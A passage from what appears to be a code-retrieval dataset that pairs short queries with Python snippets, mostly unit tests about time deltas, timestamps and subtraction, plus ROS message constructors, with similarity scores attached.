'{{ $minutes }}',\n 'seconds': '{{ $seconds }}',\n },\n 'timestamp_a': self.timestamp_b,\n 'timestamp_b': self.timestamp_a,\n }\n self.configure_block(blk, config)\n\n # process a list of signals\n blk.start()\n blk.process_signals([\n # the default case\n Signal({\n 'days': False,\n 'hours': False,\n 'minutes': False,\n 'seconds': True,\n }),\n # all units\n Signal({\n 'days': True,\n 'hours': True,\n 'minutes': True,\n 'seconds': True,\n }),\n ])\n blk.stop()\n\n # check output\n self.assert_last_signal_list_notified([\n Signal({\n 'seconds': self.total_seconds * -1,\n }),\n Signal({\n 'days': -1,\n 'hours': -12,\n 'minutes': -42,\n 'seconds': -3.142,\n }),\n ])", "def assert_timeout(self) -> None:", "def inner_test(param: datetime.timedelta):\n self.assertEqual(param, datetime.timedelta(\n days=3, hours=2, minutes=5, seconds=43\n ))", "def test_negation(self):\n\n a1 = tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 1, -2, 3, -4)\n\n a2 = -a1\n\n self.assertEqual(a2,\n tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], -1, 2, -3, 4))", "def test9(self):\n sig1 = np.array([0, 1, 0])\n sig2 = np.array([0, 0, 1, 0])\n d, p = EventSync.estimate_delay(sig1, sig2)\n self.assertTrue(d == -1)", "def test_delta_minus(self):\n d = Delta(\"-50\")\n self.assertEqual(d.cmp(0, 50), False)\n self.assertEqual(d.cmp(51, 0), True)\n self.assertEqual(d.cmp(5, 10), False)\n d = Delta(\"-50=\")\n self.assertEqual(d.cmp(50, 0), True)\n d = Delta(\"-50%\")\n self.assertEqual(d.cmp(25, 10), True)\n self.assertEqual(d.cmp(10, 25), False)", "def test_t(self):\n assert np.isclose(self.stepper.t, self.final_t)", "def test_subtract_zero_arg(self):\n try:\n self.assertEqual(subtract(0, -6), 7)\n except Exception as error:\n print(f'Got error in {inspect.stack()[0][3]}, {error}')", "def test_negative(self):\n self.assertFalse(validate_measure_input('-1', self.measures))", "def test_subtract_all_args_greater_zero(self):\n try:\n self.assertEqual(subtract(30, 16), 15)\n except Exception as error:\n print(f'Got error in {inspect.stack()[0][3]}, {error}')", "def test_bad_interval(self):\n # Intentionally set a small interval (3 min) to fail.\n interval = np.timedelta64(3, 'm')\n self.assertFalse(utils.check_timestamps(self.times, interval))", "def test_mock_monotonic_clock__raises_on_negative_step() -> None:\n clock = MockMonotonicClock(0)\n with raises(ClockError):\n clock.step_size = -1", "def test8(self):\n sig1 = np.array([1, 0, 0, 0])\n sig2 = np.array([0, 1, ])\n d, p = EventSync.estimate_delay(sig1, sig2)\n self.assertTrue(d == -1)", "def test_duration_argument_is_negative(self):\n with self.assertRaises(ValueError) as cm:\n DurationMixin(duration=-10)\n\n self.assertEqual(\n cm.exception.message,\n 'DurationMixin.duration should be an non-negative float'\n )", "def check_time():\n times = get_times()\n time_difference = abs((times['local'] - times['target']).total_seconds())\n return time_difference < post_time_tol_seconds", "def assert_TPVE(self, *args, **kw):\n return self.assertRaises(TimeParserValueError, *args, **kw)", "def inner_test(param: datetime.timedelta):\n pass", "def test_total_time_no_end_time(time_record_factory):\n d = datetime.datetime(2018, 10, 1, 15, 26)\n t = time_record_factory(time_start=d, time_end=None)\n expected = datetime.timedelta(0)\n assert t.total_time == expected", "def test4(self):\n sig1 = np.array([0, 1, 0])\n sig2 = np.array([0, 0, 1])\n d, p = EventSync.estimate_delay(sig1, sig2)\n self.assertTrue(d == -1)", "def test_with_now_minus_2_days(self):\n self.assertEqual(ageid(self.now - timedelta(2)), 'age3')", "def test_debt_target_expired(self):\n measurement = self.measurement(\n self.metric(accept_debt=True, debt_target=\"100\", issue_ids=[\"FOO-40\"]),\n count={\"debt_target\": \"100\"},\n issue_status=[{\"status_category\": \"done\", \"issue_id\": \"FOO-40\"}],\n )\n self.assertTrue(measurement.debt_target_expired())", "def test_minus(self):\n print('test_minus');\n self.assertEqual(90, minus(100, 10))", "def test_parse_time_with_invalid_interval(self):\n now = datetime(2015, 2, 1, 0, 0, 0)\n self.assert_TPVE(parse_time, \"-0\", now)\n self.assert_TPVE(parse_time, \"-12\", now)\n self.assert_TPVE(parse_time, \"-12fortnights\", now)\n self.assert_TPVE(parse_time, \"-20150101\", now)", "def test_duration_attribute_is_negative(self):\n d = DurationMixin(duration=10)\n\n with self.assertRaises(ValueError) as cm:\n d.duration = -10\n\n self.assertEqual(\n cm.exception.message,\n 'DurationMixin.duration should be an non-negative float'\n )", "def test_minus(self):\n self.assertEqual(1, minus(3, 2))", "def test_issue_delete_time(self):\n pass", "def test_debt_target_not_expired(self):\n measurement = self.measurement(\n self.metric(accept_debt=True, debt_target=\"100\"),\n count={\"debt_target\": \"100\"},\n issue_status=[],\n )\n self.assertFalse(measurement.debt_target_expired())", "def test_invalid_time_in_past(event_member):\n _, member, event_id = event_member\n past = date.today() - timedelta(days=5)\n start = datetime.combine(past, time(15, 0))\n end = start + timedelta(days=8)\n expect_error(edit, InputError, member.username, event_id,\n True, start, end)", "def test_subtraction():\n assert calculator.subtract(7, 3) == 4\n assert calculator.subtract(7.0, 3.0) == 4.0\n assert calculator.subtract(7, -3) == 10\n assert calculator.subtract(7.0, -3.0) == 10.0", "def test_time(self):\r\n pass", "def test_invalid_time_too_late(event_member):\n _, member, event_id = event_member\n current = date.today() + timedelta(days=1)\n start = (datetime.combine(current, time(16, 30)) +\n timedelta(days=(MAX_DAYS - 2)))\n end = start + timedelta(days=5)\n expect_error(edit, InputError, member.username, event_id,\n True, start, end)", "def test_travel_full_down(self):\n travelcalculator = TravelCalculator(25, 50)\n with patch(\"time.time\") as mock_time:\n mock_time.return_value = 1580000000.0\n travelcalculator.set_position(20)\n travelcalculator.start_travel_down()\n\n mock_time.return_value = 1580000019.0\n assert not travelcalculator.position_reached()\n assert not travelcalculator.is_closed()\n assert not travelcalculator.is_open()\n\n mock_time.return_value = 1580000020.0\n assert travelcalculator.position_reached()\n assert travelcalculator.is_closed()\n assert not travelcalculator.is_open()", "def test2(self):\n sig1 = np.array([0, 1, 0, 0])\n sig2 = np.array([0, 1, 0])\n d, p = EventSync.estimate_delay(sig1, sig2)\n self.assertTrue(d == 0)", "def test_negative():\n assert is_leap_year(2010) is False", "def assert_almost_equal(self, val1, val2, delta):\n return self.assertTrue(\n 0 <= abs(val1 - val2) <= delta,\n \"Absolute difference of {} and {} ({}) is not within {}\".format(\n val1,\n val2,\n abs(val1-val2),\n delta,\n ),\n )", "def test_timeout_elapsed_exception(self):\n deadline = Deadline(-MS)\n with self.assertRaises(TimeoutError):\n deadline.timeout()", "def test_decimal_time(self):\n test_time = random.random() * 24\n test_string = \"AndyTimeZT{0}\".format(test_time)\n expected = test_time\n computed = self.parser.extract_zt(test_string)\n delta = computed - expected\n self.assertTrue(delta < 0.001)", "def test_out_of_date(self):\n self.assertTrue(update_available(0.0))", "def test_with_now_minus_1_day(self):\n self.assertEqual(ageid(self.now - timedelta(1)), 'age2')", "def test_datetime(self):\n diff = self.machine_date - self.actual_date < datetime.timedelta(0, 20, 0)", "def verify_event_timing(self, event, item):\n return True", "def pytest_timeout_cancel_timer(item):", "def check_diff(self,game,wanted_diff,wanted_starting_time=''):\n return True", "def test_with_now_minus_3_days(self):\n self.assertEqual(ageid(self.now - timedelta(3)), 'age4')", "def test_new_log_diff():\n assert get_clip(audlist, log, 1) != get_clip(audio['NTF'], log, 1)", "def test_absolute_truth():\n assert True", "def test_neg():\n # Test for negation with scalar Rnode object\n x = Rnode(5.0)\n z = -x\n try:\n assert z.value == -1 * x.value\n except AssertionError as e:\n print(e)\n raise AssertionError", "def test_minus(self):\n self.assertEqual(1, foo.minus(3, 2))", "def test_queryset_with_deltas(time_record_factory):\n now = timezone.now()\n time_record_factory(time_start=now)\n t1 = time_record_factory(\n time_end=now + datetime.timedelta(days=1),\n time_start=now,\n )\n t2 = time_record_factory(\n time_end=now + datetime.timedelta(hours=1),\n time_start=now,\n )\n\n records = models.TimeRecord.objects.with_deltas()\n\n # Only records with an end time should be included\n assert list(records) == [t1, t2]\n\n # Each record should be annotated with its delta\n for record in records:\n assert record.delta == record.time_end - record.time_start", "def test3(self):\n sig1 = np.array([0, 1, 0])\n sig2 = np.array([0, 1, 0, 0])\n d, p = EventSync.estimate_delay(sig1, sig2)\n self.assertTrue(d == 0)", "def test_no_timesteps_property(self):\n expected_values = {\n 'no_timesteps': 1000,\n 'no_sweeps': 10,\n 'no_channels': 4,\n }\n test_rec = rt.Recording(\n np.zeros(\n [\n expected_values['no_channels'],\n expected_values['no_timesteps'],\n expected_values['no_sweeps'],\n ]\n ),\n dt=0.1,\n )\n self.assertEqual(\n test_rec.no_timesteps,\n expected_values['no_timesteps'],\n 'Expected {} for `no_timesteps` property; got {} instead.'.format(\n expected_values['no_timesteps'], test_rec.no_timesteps\n ),\n )", "def test1(self):\n sig1 = np.array([0, 1, 0])\n sig2 = np.array([0, 1, 0])\n d, p = EventSync.estimate_delay(sig1, sig2)\n self.assertTrue(d == 0)", "def test_duration_argument_skipped(self):\n d = DurationMixin()\n self.assertEqual(d.duration, 0)", "def test_invalid(self):\n created = datetime.datetime(2019, 1, 1, tzinfo=datetime.timezone.utc)\n last_used = datetime.datetime(2019, 1, 2, tzinfo=datetime.timezone.utc)\n key = Key('user2', 'ldasfkk', 'Inactive', created, last_used)\n with pytest.raises(AssertionError):\n key.audit(5, 1, 1, 1)", "def test_start_before_end(self):\n start = timezone.now()\n end = start + timedelta(seconds=1)\n actual = validate_timeframe(start, end)\n expected = None\n self.assertEqual(actual, expected)", "def test_other_event(self):\n M = simulation.EventMonitor(self.G, event='other')\n sim = simulation.Simulation(self.G, M, dt=self.dt)\n sim.run(self.t_max)\n\n times = (~self.G.pattern).nonzero()[1]*self.dt\n self.assertTrue(np.allclose(sorted(times), M.t))\n for (i, t) in zip(M.i, M.t):\n self.assertFalse(self.G.pattern[i, int_r(t/self.dt)])", "def assert_timer_halfway(timer):\n if timer.clock.realtime:\n assert timer.elapsed >= 0.5 * timer.timeout\n assert timer.elapsed < timer.timeout\n else:\n assert math.isclose(timer.elapsed, 0.5 * timer.timeout)\n assert timer.running\n assert not timer.timed_out\n assert timer.remaining > 0\n if timer.clock.realtime:\n assert timer.remaining <= 0.5 * timer.timeout\n else:\n assert math.isclose(timer.remaining, 0.5 * timer.timeout)", "def test_base_period_tolerance(delta, expected):\n result = wrap(180 - delta)\n print(result, np.isclose(result, -180))\n assert np.isclose(result, -180)[0] == expected", "def test_debt_target_not_expired_when_new_issue_added(self):\n measurement = self.measurement(\n self.metric(accept_debt=True, debt_target=\"100\", issue_ids=[\"FOO-41\", \"FOO-42\"]),\n count={\"debt_target\": \"100\"},\n issue_status=[{\"status_category\": \"done\", \"issue_id\": \"FOO-41\"}],\n )\n self.assertFalse(measurement.debt_target_expired())", "def test_time_field():", "def mempool_assert_absolute_time_exceeds(condition: ConditionWithArgs, timestamp: uint64) -> Optional[Err]:\n try:\n expected_seconds = int_from_bytes(condition.vars[0])\n except ValueError:\n return Err.INVALID_CONDITION\n\n if timestamp is None:\n timestamp = uint64(int(time.time()))\n if timestamp < expected_seconds:\n return Err.ASSERT_SECONDS_ABSOLUTE_FAILED\n return None", "def test_long_run_case_that_we_want_to_skip():\n time.sleep(30)\n assert 0", "def test_is_expired_time_based(self):\n expired_dt = datetime.now() + timedelta(hours=-1)\n good_dt = datetime.now() + timedelta(hours=1)\n expired_pass = DoorPassFactory.create(device=self.device, expires_at=expired_dt)\n good_pass = DoorPassFactory.create(device=self.device, expires_at=good_dt)\n self.assertTrue(expired_pass.is_expired())\n self.assertFalse(good_pass.is_expired())", "def test_negative_stop(self):\n self.assertArrayEqual(self.dset[2:-2], self.arr[2:-2])", "def test_subtract(self):\n self.assertEqual(work_file.subtract(10, 5), 5)\n self.assertEqual(work_file.subtract(-1, 1), -2)\n self.assertEqual(work_file.subtract(-1, -1), 0)", "def test_general_subset_invalid_time():\n pass", "def test_hours():\n assert_equal(datetime.timedelta(hours=1), convert_delta(\"1h\"))", "def test_timestep(self):\n class Mock(object):\n def __init__(self):\n self.t = 0.0\n self.dt = None\n\n def evolve(self1, t, dt):\n if self1.dt is not None:\n self.assertAlmostEqual(self1.dt, dt)\n else:\n self1.dt = dt\n\n self.assertAlmostEqual(self1.t, t)\n\n self1.t += self1.dt\n\n t_max = 10.0\n dt = 0.2\n\n G = Mock()\n simulation.Simulation(G, dt=dt).run(t_max)\n self.assertAlmostEqual(G.dt, dt)", "def test_failed():\n assert False", "def test_setDeadlineTwice(self):\n self.session.setDeadline(10.0)\n self.session.setDeadline(9.0)\n decreased = self.session.getRemainingTime()\n self.session.setDeadline(11.0)\n still_decreased = self.session.getRemainingTime()\n self.assertEqual((decreased, still_decreased), (9.0, 9.0))", "def test_blind_delete_with_datetime(self):\r\n uid = uuid4()\r\n tmp = TestTimestampModel.create(id=uid, count=1)\r\n\r\n TestTimestampModel.get(id=uid).should.be.ok\r\n\r\n plus_five_seconds = datetime.now() + timedelta(seconds=5)\r\n\r\n TestTimestampModel.objects(id=uid).timestamp(plus_five_seconds).delete()\r\n\r\n with self.assertRaises(TestTimestampModel.DoesNotExist):\r\n TestTimestampModel.get(id=uid)\r\n\r\n tmp = TestTimestampModel.create(id=uid, count=1)\r\n\r\n with self.assertRaises(TestTimestampModel.DoesNotExist):\r\n TestTimestampModel.get(id=uid)", "def test_timestamp():\n timestamp = 10\n timeorder = jhhalchemy.model.time_order.TimeOrderMixin()\n timeorder.timestamp = timestamp\n assert timeorder.time_order == -timestamp\n assert timeorder.timestamp == timestamp", "def test_issue_tracked_times(self):\n pass", "def test_timestamp_is_negative():\n mock_message.timestamp = Mock(return_value=(1, -1))\n new_message = Message(mock_message)\n\n assert new_message.value == mock_message.value()\n assert new_message._raw == mock_message\n assert new_message._meta.key == mock_message.key()\n assert new_message._meta.partition == mock_message.partition()\n assert new_message._meta.offset == mock_message.offset()\n assert new_message._meta.topic == mock_message.topic()\n assert new_message._meta.timestamp is None\n assert new_message._meta.datetime is None", "def test_ensure_not_ts_pass(self):\n self.assertEqual(ensure_not_ts(self.jobset1), 'completed')", "def test_time_lapse(self):\n t0 = time.time()\n time.sleep(2)\n lap = time_lapse(t0)\n self.assertEqual(lap, '00:00:02')", "def test_warped():\n today = arrow.utcnow().to('local')\n assert (humanize_arrow_date(today.isoformat())=='Tomorrow')\n yesterday = today.replace(days =-1)\n assert (humanize_arrow_date(yesterday.isoformat())=='Today')\n before_yesterday = yesterday.replace(days=-1)\n assert(humanize_arrow_date(before_yesterday.isoformat())=='Yesterday')", "def test_UniformTime_repr():", "def test_timestamp_backward(self, mock):\n mock.configure_mock(**(self.config_payload(0, 1)))\n self.assertRaises(\n AssertionError,\n lf.lambda_handler, event=self.lambdaevent, context=None)\n mock.client.return_value.update_thing_shadow.assert_not_called()", "def test_time(self):\n M = simulation.StateMonitor(self.G, 'v')\n sim = simulation.Simulation(self.G, M, dt=self.dt)\n sim.run(self.t_max)\n self.assertTrue(np.allclose(M.t, np.arange(0, self.t_max, self.dt)))", "def test_timestamps(self):\n test_particle = self.TestDataParticle(self.sample_raw_data,\n preferred_timestamp=DataParticleKey.PORT_TIMESTAMP,\n internal_timestamp=self.sample_internal_timestamp)\n\n self.assertRaises(SampleException, test_particle.generate_raw)", "def test_fall_back(self):\n # Exact crossover time:\n # datetime.datetime(2011, 11, 6, 2, 0, 0, tzinfo=pytz.utc)\n # This test will use times on either side of it.\n\n # From the PDT vantage point, the run time is 24.2 and 48.2 hours away:\n s1a, s1b = self.hours_to_job_at_datetime(\n 'tz_test_job', 2011, 11, 6, 0, 50, 0)\n\n # From the PST vantage point, the run time is 21.8 and 45.8 hours away:\n s2a, s2b = self.hours_to_job_at_datetime(\n 'tz_test_job', 2011, 11, 6, 2, 10, 0)\n\n # Make sure the measurements are consistent for each vantage point,\n # meaning that each run is 24 hours apart no matter where you measure\n # from, even if the start time appears different for each vantage\n # point.\n self._assert_range(s1b - s1a, 23.99, 24.01)\n self._assert_range(s2b - s2a, 23.99, 24.01)\n\n # Start times should differ by 2.4 hours.\n self._assert_range(s1a - s2a, 2.39, 2.41)", "def test_travel_down_with_updates(self):\n travelcalculator = TravelCalculator(25, 50)\n with patch(\"time.time\") as mock_time:\n mock_time.return_value = 1580000000.0\n travelcalculator.set_position(40)\n travelcalculator.start_travel(100) # 15 seconds to reach 100\n\n # time not changed, still at beginning\n assert travelcalculator.current_position() == 40\n assert not travelcalculator.position_reached()\n assert travelcalculator.travel_direction == TravelStatus.DIRECTION_DOWN\n\n mock_time.return_value = 1580000002.0\n assert travelcalculator.current_position() == 48\n assert not travelcalculator.position_reached()\n # update from bus matching calculation\n travelcalculator.update_position(48)\n assert travelcalculator.current_position() == 48\n assert not travelcalculator.position_reached()\n\n mock_time.return_value = 1580000010.0\n assert travelcalculator.current_position() == 80\n assert not travelcalculator.position_reached()\n # update from bus not matching calculation takes precedence (1 second slower)\n travelcalculator.update_position(76)\n assert travelcalculator.current_position() == 76\n assert not travelcalculator.position_reached()\n # travel time extended by 1 second due to update from bus\n mock_time.return_value = 1580000015.0\n assert travelcalculator.current_position() == 96\n assert not travelcalculator.position_reached()\n mock_time.return_value = 1580000015.0 + 1\n assert travelcalculator.current_position() == 100\n assert travelcalculator.position_reached()", "def test_was_published_recently_with_old_todo(self):\n time = timezone.now() - datetime.timedelta(days=1, seconds=1)\n future_todo = TodoItem(pub_date=time)\n self.assertIs(future_todo.was_published_recently(), False)", "def test_delta_val(self):\n d = Delta(\"+-3\")\n self.assertEqual(d.cmp(0, 1), False)\n self.assertEqual(d.cmp(1, 4), False)\n self.assertEqual(d.cmp(1, 5), True)", "def test_calculate_supervisory_delta_put(self):\n SDP = calculate_supervisory_delta_put()\n \n self.assertEqual(SDP, -0.27)", "def test_does_die(self):\n self.herb.fitness = 0\n self.herb.params[\"omega\"] = 1\n nt.assert_true(self.herb.death())", "def test_does_not_die(self):\n self.herb.fitness = 1\n nt.assert_false(self.herb.death())", "def test_blind_delete(self):\r\n uid = uuid4()\r\n tmp = TestTimestampModel.create(id=uid, count=1)\r\n\r\n TestTimestampModel.get(id=uid).should.be.ok\r\n\r\n TestTimestampModel.objects(id=uid).timestamp(timedelta(seconds=5)).delete()\r\n\r\n with self.assertRaises(TestTimestampModel.DoesNotExist):\r\n TestTimestampModel.get(id=uid)\r\n\r\n tmp = TestTimestampModel.create(id=uid, count=1)\r\n\r\n with self.assertRaises(TestTimestampModel.DoesNotExist):\r\n TestTimestampModel.get(id=uid)", "def zero_failures(self) -> bool:\n return abs(self.failurerate) < 1e-7", "def test_negative_input(self):\n negative_data_down = np.full_like(\n self.cube_uv_down.data, dtype=np.float32, fill_value=-0.1\n )\n negative_uv_down = self.cube_uv_down.copy(data=negative_data_down)\n msg = (\n \"The radiation flux in UV downward contains data \"\n \"that is negative or NaN. Data should be >= 0.\"\n )\n with self.assertRaisesRegex(ValueError, msg):\n calculate_uv_index(negative_uv_down)", "def test_coming_up_two_days_past(self):\n time = timezone.now() + datetime.timedelta(days=-2)\n tomorrow_event = Event(event_date=time)\n self.assertIs(tomorrow_event.coming_up(), False)", "def test_notSetDeadline(self):\n self.assertEqual(None, self.session.getRemainingTime())", "def test_dejitter_timestamps():\n n_steps = 100\n n_tests = 50\n sfreqs = np.linspace(1, 5000, n_tests).astype(int)\n last_times = np.random.randint(-100, 100, size=n_tests)\n test_timestamps = np.random.random((n_tests, n_steps)) + np.arange(n_steps)\n expected_timestamps = [np.arange(n_steps)/sfreq + last_times[i] + 1/sfreq\n for i, sfreq in enumerate(sfreqs)]\n for i, args in enumerate(zip(test_timestamps, sfreqs, last_times)):\n dejittered = acquire.dejitter_timestamps(*args)\n # there may be some floating-point errors, so just make sure the\n # difference is tiny\n assert np.all((dejittered - expected_timestamps[i]) < 1e-14)" ]
[ "0.7007831", "0.6637345", "0.6576894", "0.6474647", "0.64391077", "0.6374031", "0.6313927", "0.6297262", "0.62733597", "0.6259941", "0.62490773", "0.62064755", "0.62022203", "0.6191", "0.6171475", "0.61501443", "0.610897", "0.6103212", "0.6097491", "0.609512", "0.6081113", "0.6078611", "0.6055014", "0.60354775", "0.6035291", "0.60194445", "0.6000014", "0.5996328", "0.59930754", "0.59916365", "0.59891975", "0.5987591", "0.59698844", "0.59584165", "0.59458506", "0.59400475", "0.58992374", "0.5897231", "0.5891707", "0.58915406", "0.5891442", "0.58790684", "0.58773285", "0.5876486", "0.58748245", "0.58709466", "0.58703154", "0.58629996", "0.58614624", "0.5860151", "0.5859797", "0.5859504", "0.58542204", "0.5843233", "0.58321273", "0.5830445", "0.5820167", "0.5815123", "0.5809749", "0.58067614", "0.5798627", "0.57927394", "0.5791354", "0.5784595", "0.5784368", "0.57823044", "0.57749975", "0.5771128", "0.5771017", "0.57633066", "0.5753922", "0.574065", "0.57391346", "0.5733609", "0.5733281", "0.5731281", "0.5725819", "0.57216823", "0.5714457", "0.57031333", "0.56980324", "0.5696622", "0.567878", "0.56698495", "0.5668745", "0.5664832", "0.5662515", "0.56602347", "0.5659865", "0.56570274", "0.5654393", "0.56530595", "0.56524444", "0.56480247", "0.5639028", "0.56382066", "0.56372654", "0.56313366", "0.56275594", "0.5623953" ]
0.6970346
1
Constructor. Any message fields that are implicitly/explicitly set to None will be assigned a default value. The recommend use is keyword arguments as this is more robust to future message changes. You cannot mix inorder arguments and keyword arguments.
def __init__(self, *args, **kwds): if args or kwds: super(MoveGroupActionGoal, self).__init__(*args, **kwds) #message fields cannot be None, assign default values for those that are if self.header is None: self.header = std_msgs.msg.Header() if self.goal_id is None: self.goal_id = actionlib_msgs.msg.GoalID() if self.goal is None: self.goal = moveit_msgs.msg.MoveGroupGoal() else: self.header = std_msgs.msg.Header() self.goal_id = actionlib_msgs.msg.GoalID() self.goal = moveit_msgs.msg.MoveGroupGoal()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, *args, **kwds):\n if args or kwds:\n super(KomodoSpeechRecCommand, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.cmd is None:\n self.cmd = ''\n if self.cat is None:\n self.cat = ''\n else:\n self.header = std_msgs.msg.Header()\n self.cmd = ''\n self.cat = ''", "def __init__(self, message=None):\n self.message = message", "def __init__(self, message=None):\n self.message = message", "def __init__(self, message=None) -> None:\n super().__init__(message)", "def __init__(self, message: str = None, **kwargs):\n self.message = message\n self.kwargs = kwargs\n self.args = {}\n self.args['message'] = self.message\n self.args['args'] = self.kwargs", "def __init__(self, message=None):\n\n self._message = message", "def __init__(self, message, *args, **kwargs):\n self.message = message\n super().__init__(*args, **kwargs)", "def __init__(self, message: str) -> None:\n self.message = message", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(AlignModelSrvRequest, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.model is None:\n self.model = articulation_msgs.msg.ModelMsg()\n if self.data is None:\n self.data = articulation_msgs.msg.ModelMsg()\n else:\n self.model = articulation_msgs.msg.ModelMsg()\n self.data = articulation_msgs.msg.ModelMsg()", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(ManipTaskActionGoal, self).__init__(*args, **kwds)\n # message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.goal_id is None:\n self.goal_id = actionlib_msgs.msg.GoalID()\n if self.goal is None:\n self.goal = coordinator.msg.ManipTaskGoal()\n else:\n self.header = std_msgs.msg.Header()\n self.goal_id = actionlib_msgs.msg.GoalID()\n self.goal = coordinator.msg.ManipTaskGoal()", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(PanTiltFdbk, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.pan is None:\n self.pan = movo_msgs.msg.PanTiltActuatorFdbk()\n if self.tilt is None:\n self.tilt = movo_msgs.msg.PanTiltActuatorFdbk()\n else:\n self.header = std_msgs.msg.Header()\n self.pan = movo_msgs.msg.PanTiltActuatorFdbk()\n self.tilt = movo_msgs.msg.PanTiltActuatorFdbk()", "def __init__(self, level=None, message=None, process_id=None, user_name=None, timestamp=None):\n\n self._level = None\n self._message = None\n self._process_id = None\n self._user_name = None\n self._timestamp = None\n\n if level is not None:\n self.level = level\n if message is not None:\n self.message = message\n if process_id is not None:\n self.process_id = process_id\n if user_name is not None:\n self.user_name = user_name\n if timestamp is not None:\n self.timestamp = timestamp", "def __init__(self, message: str) -> None:\n\n super().__init__(message)", "def __init__(self, message: str) -> None:\n\n super().__init__(message)", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(DrivetrainCommand, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg._Header.Header()\n if self.gear is None:\n self.gear = 0\n if self.front_diff is None:\n self.front_diff = 0\n if self.rear_diff is None:\n self.rear_diff = 0\n else:\n self.header = std_msgs.msg._Header.Header()\n self.gear = 0\n self.front_diff = 0\n self.rear_diff = 0", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message):\n super().__init__(message)\n self.message = message", "def __init__(self, message: str):\n self.message = message", "def __init__(self, message: str):\n self.message = message", "def __init__(self, message: str):\n self.message = message", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(RobotDescription, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.robot_id is None:\n self.robot_id = opil_v2.msg.Id()\n if self.agv_msg is None:\n self.agv_msg = opil_v2.msg.RobotDescriptionAGV()\n else:\n self.header = std_msgs.msg.Header()\n self.robot_id = opil_v2.msg.Id()\n self.agv_msg = opil_v2.msg.RobotDescriptionAGV()", "def __init__(self, message):\r\n self.__message = message", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(sbpl_msg, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.sbpl_wait_flag is None:\n self.sbpl_wait_flag = False\n if self.sbpl_present_x is None:\n self.sbpl_present_x = 0\n if self.sbpl_present_y is None:\n self.sbpl_present_y = 0\n if self.sbpl_new_x is None:\n self.sbpl_new_x = 0\n if self.sbpl_new_y is None:\n self.sbpl_new_y = 0\n if self.start_P3DX_motion is None:\n self.start_P3DX_motion = False\n else:\n self.sbpl_wait_flag = False\n self.sbpl_present_x = 0\n self.sbpl_present_y = 0\n self.sbpl_new_x = 0\n self.sbpl_new_y = 0\n self.start_P3DX_motion = False", "def __init__(self, message: str) -> None:\n super().__init__(message)", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(IrTransformMsg, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.s1 is None:\n self.s1 = False\n if self.s2 is None:\n self.s2 = False\n if self.s3 is None:\n self.s3 = False\n if self.s4 is None:\n self.s4 = False\n if self.p1 is None:\n self.p1 = geometry_msgs.msg.PointStamped()\n if self.p2 is None:\n self.p2 = geometry_msgs.msg.PointStamped()\n if self.p3 is None:\n self.p3 = geometry_msgs.msg.PointStamped()\n if self.p4 is None:\n self.p4 = geometry_msgs.msg.PointStamped()\n else:\n self.s1 = False\n self.s2 = False\n self.s3 = False\n self.s4 = False\n self.p1 = geometry_msgs.msg.PointStamped()\n self.p2 = geometry_msgs.msg.PointStamped()\n self.p3 = geometry_msgs.msg.PointStamped()\n self.p4 = geometry_msgs.msg.PointStamped()", "def __init__(self, buf=None, *args, **kwargs):\n super(Message, self).__init__(buf, *args, **kwargs)\n self.__initialized = True", "def __init__(self, message):\n self.message = message", "def __init__(self, message):\n self.message = message", "def __init__(self, message):\n self.message = message", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(CAMERA_DATA_MSG, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.messageID is None:\n self.messageID = 0\n if self.localStamp is None:\n self.localStamp = vehicle_msgs.msg.FrameStamp()\n if self.globalStamp is None:\n self.globalStamp = vehicle_msgs.msg.FrameStamp()\n if self.camera is None:\n self.camera = vehicle_msgs.msg.Camera()\n if self.camera_obj is None:\n self.camera_obj = [vehicle_msgs.msg.Camera_Obj() for _ in range(10)]\n if self.camera_lane is None:\n self.camera_lane = vehicle_msgs.msg.Camera_Lane()\n else:\n self.header = std_msgs.msg.Header()\n self.messageID = 0\n self.localStamp = vehicle_msgs.msg.FrameStamp()\n self.globalStamp = vehicle_msgs.msg.FrameStamp()\n self.camera = vehicle_msgs.msg.Camera()\n self.camera_obj = [vehicle_msgs.msg.Camera_Obj() for _ in range(10)]\n self.camera_lane = vehicle_msgs.msg.Camera_Lane()", "def __init__(self, message='', incomplete=True):\n super().__init__(message)\n self.incomplete = incomplete", "def testConstructorKwargs(self):\n class SomeMessage(messages.Message):\n name = messages.StringField(1)\n number = messages.IntegerField(2)\n\n expected = SomeMessage()\n expected.name = 'my name'\n expected.number = 200\n self.assertEquals(expected, SomeMessage(name='my name', number=200))", "def __init__(self, msg=None):\n if msg is None:\n msg = \"That bonehead {author} should really hear your rage about this disgraceful result! Feel free to tell them at {email}\".format(\n author=__author__, email=__email__)\n\n self.args = (msg, *self.args)", "def __init__(self, message):\n super().__init__()\n self._message = message", "def __init__(self, customMessage=\"custom message\"):\n 